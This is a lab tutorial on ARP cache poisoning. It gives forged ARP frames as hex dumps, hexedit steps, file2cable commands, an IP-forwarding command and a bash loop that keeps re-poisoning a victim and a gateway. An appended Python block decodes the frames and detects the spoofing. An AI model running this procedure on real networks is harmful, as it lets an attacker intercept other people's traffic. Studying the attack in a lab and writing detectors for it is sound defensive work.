ARP spoofing, also known as ARP cache poisoning or ARP poison routing (APR), is a technique used to attack a Local Area Network (LAN), and it is only effective if there is no tiered security in place.
Principle of ARP Spoofing
To summarize, ARP spoofing can be termed a man-in-the-middle attack or a DDoS attack, as it will send a nonexistent MAC into the network. The diagram below will give you some idea of it.
To give you a better understanding of the packet, I decided to capture the info in my lab; the process consists of different steps and stages.
Stage 1: Collecting Packet information
1) The tool we use in this lab is Wireshark; you can download it from the Wireshark Download Page.
2) After you have performed the installation, run Wireshark.
3) Configure the interface for capturing packets.
4) As shown on screen, you will need to check "Capture packets in promiscuous mode", which means sniffing mode.
5) After you have completed all the settings, click the Start button and you will see that some packets have been captured.
6) You should get some packets like the ones below; these are of interest for our next step.
Stage 2: Analysis of the packet
This is a sample of the correct content of the file.
Export the selected packet to /tmp/script/arp
Edit the file by typing this command (hexedit -b /tmp/script/arp)
Info | Remark
Destination | 00 50 56 F4 78 89 (GW) @ 192.168.18.2
Target IP address | C0 A8 12 02 (GW) @ 192.168.18.2
Source | 00 0C 29 F1 EF DB (Hacker) @ 192.168.18.139
Sender IP | C0 A8 12 8B (Hacker) @ 192.168.18.139
Victim | 00 0C 29 13 80 DD @ 192.168.18.130
Victim IP | C0 A8 12 82 (GW) @ 192.168.18.130
00000000 00 0C 29 F1 EF DB 00 50 56 F4 78 89 08 06 00 01 ..)....PV.x.....
00000010 08 00 06 04 00 02 00 50 56 F4 78 89 C0 A8 12 02 .......PV.x.....
00000020 00 0C 29 F1 EF DB C0 A8 12 8B 00 00 00 00 00 00 ..).............
00000030 00 00 00 00 00 00 00 00 00 00 00 00 ............
Stage 3: Modify Packet
Start modifying the victim packet
1) hexedit -b arp-victim
2) Replace the hacker MAC address with the victim MAC address
3) Replace the gateway MAC address with the hacker MAC address
Before Changing the packet
00000000 00 0C 29 F1 EF DB 00 50 56 F4 78 89 08 06 00 01 ..)....PV.x.....
00000010 08 00 06 04 00 02 00 50 56 F4 78 89 C0 A8 12 02 .......PV.x.....
00000020 00 0C 29 F1 EF DB C0 A8 12 8B 00 00 00 00 00 00 ..).............
00000030 00 00 00 00 00 00 00 00 00 00 00 00 ............
After Changing the packet
00000000 00 0C 29 13 80 DD 00 0C 29 F1 EF DB 08 06 00 01 ..)....PV.x.....
00000010 08 00 06 04 00 02 00 0C 29 F1 EF DB C0 A8 12 02 .......PV.x.....
00000020 00 0C 29 13 80 DD C0 A8 12 82 00 00 00 00 00 00 ..).............
00000030 00 00 00 00 00 00 00 00 00 00 00 00 ............
Save the file as arp-victim and send it to the victim
file2cable -v -i eth0 -f arp-victim
Summary
Before the packet was modified
Hacker MAC | Gateway MAC | x |
x | Gateway MAC | Gateway IP address |
Hacker MAC | Hacker IP | x |
After the packet was modified
Victim MAC | Hacker MAC | x |
x | Hacker MAC | Gateway IP address |
Victim MAC | Victim IP address | x |
Stage 4: Modify Gateway packet
1) cp arp-victim arp-gateway
2) hexedit -b arp-gateway
Before Changing the packet
00000000 00 0C 29 13 80 DD 00 0C 29 F1 EF DB 08 06 00 01 ..)....PV.x.....
00000010 08 00 06 04 00 02 00 0C 29 F1 EF DB C0 A8 12 02 .......PV.x.....
00000020 00 0C 29 13 80 DD C0 A8 12 82 00 00 00 00 00 00 ..).............
00000030 00 00 00 00 00 00 00 00 00 00 00 00 ............
After Changing the packet
00000000 00 50 56 F4 78 89 00 0C 29 F1 EF DB 08 06 00 01 ..)....PV.x.....
00000010 08 00 06 04 00 02 00 0C 29 F1 EF DB C0 A8 12 82 .......PV.x.....
00000020 00 50 56 F4 78 89 C0 A8 12 02 00 00 00 00 00 00 ..).............
00000030 00 00 00 00 00 00 00 00 00 00 00 00 ............
Enable IP forwarding on the BackTrack machine
echo 1 > /proc/sys/net/ipv4/ip_forward
nano doarp.sh
chmod 700 doarp.sh
#!/bin/bash
# Resend both modified ARP frames every 2 seconds
while [ 1 ]; do
    file2cable -i eth0 -f arp-victim
    file2cable -i eth0 -f arp-gateway
    sleep 2
done
Summary
Before the packet was modified
Victim MAC | Hacker MAC | x |
x | Hacker MAC | Gateway IP address |
Victim MAC | Victim IP | x |
After the packet was modified
Gateway MAC | Hacker MAC | x |
x | Hacker MAC | Victim IP address |
Gateway MAC | Gateway IP | x |
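The three frames from the hex dumps above, decoded in wire order and checked against the lab's real IP-to-MAC bindings, as an added example that is not part of the original post. The names KNOWN, parse_arp and check_frame are assumptions made here; the bytes and addresses are the ones shown on this page.

```python
import struct

# Frames transcribed from the hex dumps on this page (60 bytes, zero padded).
PAD = "00" * 18
ORIGINAL = bytes.fromhex("000C29F1EFDB005056F4788908060001"
                         "080006040002005056F47889C0A81202"
                         "000C29F1EFDBC0A8128B" + PAD)
ARP_VICTIM = bytes.fromhex("000C291380DD000C29F1EFDB08060001"
                           "080006040002000C29F1EFDBC0A81202"
                           "000C291380DDC0A81282" + PAD)
ARP_GATEWAY = bytes.fromhex("005056F47889000C29F1EFDB08060001"
                            "080006040002000C29F1EFDBC0A81282"
                            "005056F47889C0A81202" + PAD)

# Trusted IP -> MAC bindings from the Info/Remark table (names here are assumed).
KNOWN = {"192.168.18.2": "00:50:56:f4:78:89",
         "192.168.18.130": "00:0c:29:13:80:dd",
         "192.168.18.139": "00:0c:29:f1:ef:db"}

def mac(b):
    return ":".join(f"{x:02x}" for x in b)

def parse_arp(frame):
    """Decode an Ethernet II frame carrying an IPv4-over-Ethernet ARP packet."""
    if len(frame) < 42:
        raise ValueError("too short for Ethernet + ARP headers")
    dst, src, etype = struct.unpack("!6s6sH", frame[:14])
    htype, ptype, hlen, plen, op = struct.unpack("!HHBBH", frame[14:22])
    if etype != 0x0806 or (htype, ptype, hlen, plen) != (1, 0x0800, 6, 4):
        raise ValueError("not an IPv4-over-Ethernet ARP frame")
    sha, spa, tha, tpa = struct.unpack("!6s4s6s4s", frame[22:42])
    return {"eth_dst": mac(dst), "eth_src": mac(src), "op": op,
            "sender_mac": mac(sha), "sender_ip": ".".join(map(str, spa)),
            "target_mac": mac(tha), "target_ip": ".".join(map(str, tpa))}

def check_frame(frame, bindings):
    """Return a list of alerts for one ARP frame given trusted bindings."""
    p = parse_arp(frame)
    alerts = []
    if p["eth_src"] != p["sender_mac"]:
        alerts.append("Ethernet source differs from ARP sender MAC")
    trusted = bindings.get(p["sender_ip"])
    if trusted and trusted != p["sender_mac"]:
        alerts.append(f"{p['sender_ip']} is {trusted}, frame claims {p['sender_mac']}")
    return alerts

if __name__ == "__main__":
    for name in ("ORIGINAL", "ARP_VICTIM", "ARP_GATEWAY"):
        print(name, check_frame(globals()[name], KNOWN) or "ok")
```

Both modified frames keep the Ethernet source and ARP sender MAC consistent, so only the comparison against trusted bindings (the idea behind static ARP entries and switch-side ARP inspection) flags them.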